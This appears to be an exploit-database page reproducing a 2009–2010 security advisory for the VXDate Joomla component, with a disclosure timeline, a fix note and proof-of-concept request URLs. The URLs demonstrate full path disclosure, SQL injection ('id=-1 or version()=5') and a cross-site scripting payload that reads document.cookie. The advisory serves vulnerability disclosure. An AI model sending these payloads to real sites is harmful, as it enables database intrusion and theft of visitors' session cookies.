header-logo
Suggest Exploit
vendor:
VXDate
by:
WebSecurity
7,5
CVSS
HIGH
Full path disclosure, SQL Injection and Cross-Site Scripting
200, 89, 79
CWE
Product Name: VXDate
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Vulnerabilities in VXDate for Joomla

These are Full path disclosure, SQL Injection and Cross-Site Scripting vulnerabilities. Full path disclosure can be exploited by sending a crafted request to the vulnerable URL with a single quote character. SQL Injection can be exploited by sending a crafted request to the vulnerable URL with a malicious SQL query. XSS can be exploited by sending a crafted request to the vulnerable URL with a malicious script.

Mitigation:

Update to the latest version.
Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------------------------------

I want to warn you about vulnerabilities in component VXDate for Joomla.


-----------------------------

Advisory: Vulnerabilities in VXDate for Joomla

-----------------------------

URL: http://websecurity.com.ua/3849/

-----------------------------

Timeline:



10.05.2009 - found the vulnerabilities.

12.01.2010 - announced at my site.

18.01.2010 - informed developers.

13.03.2010 - disclosed at my site.

-----------------------------

Details:

These are Full path disclosure, SQL Injection and Cross-Site Scripting vulnerabilities.


Full path disclosure:

http://site/index.php?option=com_vxdate&ct=’

http://site/index.php?option=com_vxdate&ct=1&md=details&id=’

http://site/index.php?option=com_vxdate&ct=1&md=editform&id=’



SQL Injection:

http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5

http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5


XSS:

http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Vulnerable are potentially all versions of VXDate.